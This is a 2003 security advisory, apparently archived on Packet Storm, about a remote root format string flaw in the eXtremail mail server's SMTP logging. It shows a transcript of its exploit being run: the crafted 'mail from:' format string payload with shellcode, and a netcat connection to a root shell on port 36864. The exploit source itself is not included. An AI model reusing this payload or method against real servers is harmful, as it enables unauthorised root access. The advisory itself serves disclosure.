what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eXtremail.txt

eXtremail.txt
Posted Jul 7, 2003
Authored by B-r00t

Linux eXtremail versions 1.5-8 and below hold a format string vulnerability in its logging mechanism. Exploiting this can allow for arbitrary code execution or a denial of service on the server.

tags | advisory, denial of service, arbitrary, code execution
systems | linux
SHA-256 | 9f300aec91de3f79ec8ad7dea040e62aded97cd4340b3ea05a7067bc03e93163

eXtremail.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1








Remote Vulnerabilities in eXtremail Server.
===========================================

Date: 02.07.2003
Email: B-r00t <br00t@blueyonder.co.uk>

Reference: http://www.extremail.com/
Versions: Linux eXtremail-1.5-8 => VULNERABLE
Linux eXtremail-1.5-5 => VULNERABLE

Exploit: eXtreme.c

eXtreme is a Unix mailserver, providing SMTP (port25), POP3 (port 110)
and IMAP(port 143) services. The latest versions of which are still
vulnerable to Format Strings vulnerabilities as discovered previously.

http://www.securityfocus.com/bid/2908/info/

eXtremail contains a format string vulnerability in it's logging
mechanism. It is possible for users to send SMTP commands argumented with
maliciously constructed arguments that will exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability,
remote attackers can gain superuser access on the underlying host. It is
also possible to crash eXtremail. If it is not restarted automatically, a
denial of SMTP service will result.

These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10',
however they seem to have emerged in the latest versions.

Attached exploit [eXtreme.c] for latest versions of eXtremail.

$ gcc -o eXtreme eXtreme.c

$ ./eXtreme

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2

0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3 eXtremail V1.5 DEBUG

On success a r00tshell will be spawned on port 36864.






$ ./eXtreme 192.168.0.50 2

eXtreme by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Connected to 192.168.0.50
Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send: HELO Br00t~R0x~Y3r~W0rld!
Recv: 250 Hi, I am localdomain

System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy: 0xbefff0c8
RET (shellcode): 0xbefff1d4
PAD (alignment): 1
Payload: 254 / 266 max bytes
Sending it ...
Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@
F@ /bin/shCf Vf VfC?)?A?AV v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!

Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux



- --

B#.
- ----------------------------------------------------
Email : B-r00t <br00t@blueyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------







-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39
HBOcgtG6P1BPhcxYzG/AoAM=
=GHV2
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close